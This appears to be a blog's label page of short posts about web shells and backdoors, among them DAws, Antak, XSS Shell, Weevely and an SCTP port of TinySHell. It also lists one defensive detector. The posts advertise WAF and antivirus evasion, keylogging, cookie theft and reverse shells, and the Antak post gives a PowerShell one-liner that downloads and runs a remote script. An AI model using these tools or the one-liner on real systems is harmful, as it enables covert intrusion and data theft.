Showing posts with label Shell. Show all posts

DAws - Advanced Web Shell (Windows/Linux)


There are multiple things that make DAws better than every Web Shell out there:
  1. Bypasses Disablers: DAws isn't just about using a particular function to get the job done; it uses up to 6 functions if needed. For example, if shell_exec is disabled, it automatically uses exec, passthru, system, popen or proc_open instead. The same goes for downloading a file from a link: if Curl is disabled, then file_get_contents is used instead. This feature is used widely in every section and function of the shell.
  2. Automatic Encoding: DAws randomly and automatically encodes most of your GET and POST data using XOR (with a randomized key for every session) + Base64 (we created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers), which will allow your shell to bypass pretty much every WAF out there.
  3. Advanced File Manager: DAws's File Manager contains everything a File Manager needs and even more, but the main feature is that everything is dynamically printed. The permissions of every file and folder are checked, and the functions that can be used are made available based on these permissions. This saves time and makes life much easier.
  4. Tools: DAws holds a bunch of useful tools such as "bpscan", which can identify usable and unblocked ports on the server within a few minutes, which can later on allow you to go for a bind shell, for example.
  5. Everything that can't be used at all is simply removed so users do not have to waste their time. For example, consider the execution of C++ scripts when there are no C++ compilers on the server (DAws would have checked for multiple compilers in the first place): in this case, the function is automatically removed and the user is informed.
  6. Supports Windows and Linux.
  7. Open source.

Extra Info
  • Eval Form:
    • `include` is used instead of PHP `eval` to bypass Protection Systems.
  • Download from Link - Methods:
    • PHP Curl
    • `file_put_contents`
  • Zip - Methods:
    • Linux:
      • Zip
    • Windows:
      • Vbs Script
  • Shells and Tools:
    • Extra:
      • `nohup`, if installed, is automatically used for background processing.

Antak WebShell - A webshell which utilizes PowerShell


Antak is a webshell written in C#.Net which utilizes PowerShell. Antak is a part of Nishang, and updates can be found here: https://github.com/samratashok/nishang

Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind while using commands (like changing the current directory or running session-aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in the command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
  2. Use a PowerShell one-liner (example below) for download & execute in the command box: `IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]`
  3. By uploading the script to the target and executing it.
  4. Make the script a semicolon-separated one-liner.

Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on the server (with write permissions) in the command textbox. (An OS temporary directory like C:\Windows\Temp may be writable.) Then use the Browse and Upload buttons to upload the file to that path.

Downloading a file - To download a file, enter the actual path on the server in the command textbox. Then click on the Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

PyHttpShell - Python HTTP Shell


PyHttpShell is a shell written in Python; traffic goes over the HTTP protocol using a server in the middle.

Video: https://vimeo.com/91085876


Features


  • Transport over HTTP/HTTPS.
  • Supports System Proxy Settings.
  • Multiple Hosts/Connections.
  • Download files to client machine.
  • Change Sleep time remotely.
  • Works on Win/MAC/Linux


[XSS Shell] XSS Backdoor and Zombie Manager



XSS Shell is a powerful XSS backdoor and zombie manager. This concept was first presented by "XSS-Proxy" (http://xss-proxy.sourceforge.net/). Normally in XSS attacks the attacker has one shot; in XSS Shell you can interactively send requests and get responses from the victim. You can backdoor the page.

Download

This package includes the latest version of XSS Shell and XSSTunnel. XSS Shell can be used without XSS Tunnel, however you’ll get more out of it with XSS Tunnel.

Features

XSS Shell has several features to gain full access over the victim. You can also simply add your own commands.
Most of the features can be enabled or disabled from the configuration or can be tweaked from the source code.
  • Regenerating Pages
    • This is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even if the user clicks any links in the infected page, he or she will still be under control (within cross-domain restrictions). In normal XSS attacks, when the user leaves the page you can't do anything.
    • Secondly, this feature keeps the session open, so even if the victim follows an outside link from the infected page, the session is not going to time out and you will still be in charge.
  • Keylogger
  • Mouse Logger (click points + current DOM)
  • Built-in Commands;
    • Get Keylogger Data
    • Get Current Page (Current rendered DOM / like screenshot)
    • Get Cookie
    • Execute supplied JavaScript (eval)
    • Get Clipboard (IE only)
    • Get internal IP address (Firefox + JVM only)
    • Check victim’s visited URL history

[TinySHell] Ported to SCTP


You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definitely do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use an SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also uses an encrypted connection.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!


[Hidden CMD Detector] Discover Hidden Command prompts


Hidden CMD Detector is a free tool to discover hidden command prompts and detect any hacker presence on your system.

The first thing any hacker does on getting access to a remote system is to run a hidden command shell. This tool can help you to automatically detect any such hidden cmd prompts and keep your system safe from hackers.

It can help you to discover the following types of command prompts:
  • Normal/Hidden Command Prompts
  • Renamed or custom Command Prompts
  • Reverse Command Shells launched by hacker tools like netcat
  • Command Prompts launched by User/System Process

This tool can be easily automated to run at a certain interval. It supports 3 output modes (normal, one liner, xml), making it easy to parse the result through automation scripts.
It is an ideal tool to run periodically on unattended machines to detect any hacker activity and alert the administrators.

[ShellSave v1.0] Keep all your shells organized and in one place


The idea for ShellSave arose from our own need to keep our list of web backdoors in an orderly form and avoid recording them in text files, which is inconvenient when it comes to searching.

ShellSave takes care of organizing them neatly, working hand in hand with a database and obtaining data from the supplied URL, such as the IP address, host name and geolocation of the host.


Another of its features is that it embeds the selected webshell in an iframe; this could be taken advantage of by hosting the script on a web server and then using it as a proxy when making the request to our backdoor.


As you can see, it is a very simple tool that nevertheless proves very useful after the post-exploitation of one or more targets.

The installation process is simple:
  • Create a database and import the SQL file found in the bd directory
  • Edit the config.php file with the corresponding data
  • Log in to ShellSave with the default password “test”
  • Add our webshells.


Official website: http://underterminal.nixiweb.com

[Hackersh] Free shell (command interpreter) written in Python

Hackersh ("Hacker Shell") is a free and open source (license) shell (command interpreter) written in Python with Pythonect-like syntax, built-in security commands, and out-of-the-box wrappers for various security tools. It is like a Unix pipeline, but for processing security information and metadata rather than bytes.


Download Hackersh version 0.1
Web: http://www.hackersh.org/

[Weevely] PHP Stealth Tiny Web Shell


Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.

Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing.

  • More than 30 modules to automate administration and post-exploitation tasks:
    • Execute commands and browse the remote filesystem, even with PHP security restrictions
    • Audit common server misconfigurations
    • Run SQL console pivoting on target machine
    • Proxy your HTTP traffic through target
    • Mount target filesystem to local mount point
    • Simple file transfer from and to target
    • Spawn reverse and direct TCP shells
    • Bruteforce SQL accounts through target system
    • Run port scans from target machine
    • And so on..
  • Backdoor communications are hidden in HTTP Cookies
  • Communications are obfuscated to bypass NIDS signature detection
  • Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection
You can download Weevely v1.0 here: